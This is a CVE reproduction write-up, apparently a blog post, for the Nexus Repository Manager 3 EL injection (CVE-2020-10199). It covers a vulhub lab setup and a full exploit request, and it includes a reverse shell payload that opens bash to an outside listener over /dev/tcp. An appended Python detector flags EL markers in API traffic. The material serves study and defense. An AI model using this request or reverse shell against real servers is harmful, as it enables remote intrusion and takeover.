Nexus Repository Manager 3 Remote Command Execution Vulnerability (CVE-2020-10199) Reproduction

Introduction

Nexus Repository Manager 3 is a software repository manager used to store and distribute artifacts for formats such as Maven and NuGet. Versions 3.21.1 and earlier contain an EL (expression language) injection vulnerability: attacker-controlled input is evaluated as an EL expression, which leads to remote command execution.

Affected version

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

Reference link

  • https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
  • https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10199/README.md
  • https://github.com/jas502n/CVE-2020-10199

Environment setup

The environment is Docker plus vulhub.

git clone https://github.com/vulhub/vulhub.git

Enter the corresponding directory:

Start the environment with docker-compose up -d.

Once the environment is up, visit ip:8081 in a browser to confirm the Nexus web UI is reachable.

Vulnerability reproduction

Log in to the admin console with the credentials admin:admin.
After logging in, copy the current Cookie and CSRF token and send the following request; the EL expression in memberNames is evaluated by the server:

Request:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{9*9}"]
  }
}

Reverse shell payload (used as the memberNames value in the same request; the IP and port are the listener's):

"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.133.129/7777<&1')}"
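
As an added, defender-side example (not part of the original post or of Nexus itself), the following Python inspects captured requests to the repositories REST API and flags any JSON string field that carries EL-style expression markers. It matches the $\A{...} form used above as well as the plain ${...} and #{...} spellings, so it goes slightly beyond the single payload shown on this page; the sample traffic is constructed and contains one benign group-repository request and the injection request from the write-up.

```python
import json
import re

# Path prefix of the repositories REST API targeted in the write-up.
REPO_API_PREFIX = "/service/rest/beta/repositories/"

# EL-style expression markers: "$\A{...}" as used in the CVE-2020-10199
# request above, plus the plain "${...}" and "#{...}" spellings. The optional
# backslash and letter cover the "$\A{" variant after JSON decoding.
EL_PATTERN = re.compile(r"[$#]\\?[A-Za-z]?\{")

def find_expressions(value):
    """Walk a decoded JSON value and return every string that looks like an EL expression."""
    hits = []
    if isinstance(value, str):
        if EL_PATTERN.search(value):
            hits.append(value)
    elif isinstance(value, dict):
        for v in value.values():
            hits.extend(find_expressions(v))
    elif isinstance(value, list):
        for v in value:
            hits.extend(find_expressions(v))
    return hits

def inspect_request(method, path, body):
    """Return the suspicious strings found in one captured request, or [] if it is clean."""
    if method.upper() != "POST" or not path.startswith(REPO_API_PREFIX):
        return []
    try:
        payload = json.loads(body)
    except ValueError:
        return []  # not JSON; out of scope for this check
    return find_expressions(payload)

# Constructed sample traffic (hypothetical): a benign group create, then the injection attempt.
SAMPLES = [
    ("POST", "/service/rest/beta/repositories/go/group",
     '{"name":"go-all","online":true,"storage":{"blobStoreName":"default"},'
     '"group":{"memberNames":["go-proxy"]}}'),
    ("POST", "/service/rest/beta/repositories/go/group",
     '{"name":"internal","online":true,"storage":{"blobStoreName":"default"},'
     '"group":{"memberNames":["$\\\\A{9*9}"]}}'),
]

def scan_samples(samples=SAMPLES):
    """Run the check over every sample; one list of findings per request."""
    return [inspect_request(*s) for s in samples]

if __name__ == "__main__":
    for (method, path, _), hits in zip(SAMPLES, scan_samples()):
        print(method, path, "-> ALERT" if hits else "-> ok", hits)
```

Because the marker regex is deliberately broad, the check is meant as a triage signal on repository-admin API traffic rather than a replacement for upgrading past 3.21.1.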



Source: blog.csdn.net/qq_45742511/article/details/115206627